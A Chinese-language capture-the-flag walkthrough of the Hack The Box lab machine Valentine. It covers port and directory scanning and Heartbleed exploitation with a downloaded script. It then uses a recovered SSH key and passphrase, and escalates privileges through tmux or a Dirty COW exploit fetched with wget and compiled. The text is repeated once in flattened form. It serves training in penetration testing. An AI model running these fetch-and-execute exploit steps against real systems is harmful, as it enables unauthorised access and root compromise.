HTB:Valentine 渗透测试
字数 1230 2025-08-15 21:34:03

HTB: Valentine 渗透测试教学文档

1. 靶机概述

Hack The Box (HTB) 是一个在线渗透测试平台,提供模拟真实环境的靶机用于提升渗透测试技能。本文档针对已退役的靶机 Valentine 进行详细渗透测试教学。

2. 信息收集阶段

2.1 靶机基本信息

  • IP地址: 10.129.1.190 (注意: 实际IP可能因退役而变化)
  • 操作系统: Ubuntu Linux

2.2 端口扫描

使用nmap进行端口扫描:

nmap -sV -A -Pn -O 10.129.1.190

扫描结果:

  • 22/tcp: OpenSSH 5.9p1 (Ubuntu Linux)
  • 80/tcp: Apache httpd 2.2.22 (Ubuntu)
  • 443/tcp: Apache httpd 2.2.22 (Ubuntu) with SSL

2.3 网站目录扫描

使用dirsearch进行目录扫描:

dirsearch -u http://10.129.1.190

发现重要目录:

http://10.129.1.190/dev/

该目录下包含两个文件,可能对后续渗透有用。

3. 漏洞探测

3.1 漏洞扫描

使用nmap脚本扫描443端口漏洞:

nmap --script=vuln -sV -Pn 10.129.1.190 -p 443

发现可能存在Heartbleed漏洞(CVE-2014-0160)。

3.2 Heartbleed漏洞验证

使用sslyze验证Heartbleed漏洞:

sslyze --heartbleed 10.129.1.190:443

4. 漏洞利用

4.1 Heartbleed漏洞利用

  1. 下载利用脚本:
git clone https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py
# 或
wget https://gist.githubusercontent.com/eelsivart/10174134/raw/8aea10b2f0f6842ccff97ee921a836cf05cd7530/heartbleed.py
  1. 执行漏洞利用:
python2 heartbleed.py 10.129.1.190 -p 443
  1. 获取到加密字符串,解码后得到明文:
heartbleedbelievethehype

4.2 获取加密私钥

  1. 访问之前发现的/dev目录:
http://10.129.1.190/dev/hype_key
  1. 将16进制密钥转换为ASCII:
    使用在线工具: https://www.rapidtables.com/convert/number/hex-to-ascii.html

  2. 将解密内容保存为文件并设置权限:

vim hype.key
chmod 600 hype.key

4.3 SSH远程连接

使用获取的凭据进行SSH连接:

ssh -i hype.key hype@10.129.1.190

密码尝试使用: heartbleedbelievethehype

5. 权限提升

5.1 方法一: 利用tmux会话

  1. 使用LinEnum.sh进行信息收集:
./LinEnum.sh
  1. 检查bash历史文件:
cat ~/.bash_history
  1. 发现可以执行tmux会话:
tmux
  1. 查看root进程:
ps -ef | grep root
  1. 利用tmux进行提权

5.2 方法二: 脏牛(Dirty COW)提权

  1. 下载脏牛利用代码:
wget https://github.com/FireFart/dirtycow/blob/master/dirty.c -O /tmp/dirty.c
  1. 编译并执行:
gcc -pthread /tmp/dirty.c -o /tmp/dirty
/tmp/dirty
  1. 提权成功后获取root权限

6. 关键点总结

  1. 信息收集:

    • 全面的端口扫描和服务识别
    • 网站目录枚举发现关键/dev目录
  2. 漏洞利用:

    • Heartbleed漏洞的识别和利用
    • 16进制密钥的解码和转换
  3. 权限提升:

    • 两种不同的提权方法
    • 系统配置错误和内核漏洞的利用
  4. 工具使用:

    • nmap的高级扫描技巧
    • 自定义脚本的下载和执行
    • 提权脚本的编译和使用

7. 安全建议

  1. 及时更新OpenSSL库防止Heartbleed漏洞
  2. 限制敏感目录(如/dev)的访问权限
  3. 定期更新系统内核防止脏牛类漏洞
  4. 使用最小权限原则配置服务账户
  5. 定期审计系统配置和权限设置

通过本教学文档,可以全面了解从信息收集到权限提升的完整渗透测试流程,掌握关键漏洞的识别和利用方法。

HTB: Valentine 渗透测试教学文档 1. 靶机概述 Hack The Box (HTB) 是一个在线渗透测试平台,提供模拟真实环境的靶机用于提升渗透测试技能。本文档针对已退役的靶机 Valentine 进行详细渗透测试教学。 2. 信息收集阶段 2.1 靶机基本信息 IP地址: 10.129.1.190 (注意: 实际IP可能因退役而变化) 操作系统: Ubuntu Linux 2.2 端口扫描 使用nmap进行端口扫描: 扫描结果: 22/tcp: OpenSSH 5.9p1 (Ubuntu Linux) 80/tcp: Apache httpd 2.2.22 (Ubuntu) 443/tcp: Apache httpd 2.2.22 (Ubuntu) with SSL 2.3 网站目录扫描 使用dirsearch进行目录扫描: 发现重要目录: 该目录下包含两个文件,可能对后续渗透有用。 3. 漏洞探测 3.1 漏洞扫描 使用nmap脚本扫描443端口漏洞: 发现可能存在Heartbleed漏洞(CVE-2014-0160)。 3.2 Heartbleed漏洞验证 使用sslyze验证Heartbleed漏洞: 4. 漏洞利用 4.1 Heartbleed漏洞利用 下载利用脚本: 执行漏洞利用: 获取到加密字符串,解码后得到明文: 4.2 获取加密私钥 访问之前发现的/dev目录: 将16进制密钥转换为ASCII: 使用在线工具: https://www.rapidtables.com/convert/number/hex-to-ascii.html 将解密内容保存为文件并设置权限: 4.3 SSH远程连接 使用获取的凭据进行SSH连接: 密码尝试使用: heartbleedbelievethehype 5. 权限提升 5.1 方法一: 利用tmux会话 使用LinEnum.sh进行信息收集: 检查bash历史文件: 发现可以执行tmux会话: 查看root进程: 利用tmux进行提权 5.2 方法二: 脏牛(Dirty COW)提权 下载脏牛利用代码: 编译并执行: 提权成功后获取root权限 6. 关键点总结 信息收集 : 全面的端口扫描和服务识别 网站目录枚举发现关键/dev目录 漏洞利用 : Heartbleed漏洞的识别和利用 16进制密钥的解码和转换 权限提升 : 两种不同的提权方法 系统配置错误和内核漏洞的利用 工具使用 : nmap的高级扫描技巧 自定义脚本的下载和执行 提权脚本的编译和使用 7. 安全建议 及时更新OpenSSL库防止Heartbleed漏洞 限制敏感目录(如/dev)的访问权限 定期更新系统内核防止脏牛类漏洞 使用最小权限原则配置服务账户 定期审计系统配置和权限设置 通过本教学文档,可以全面了解从信息收集到权限提升的完整渗透测试流程,掌握关键漏洞的识别和利用方法。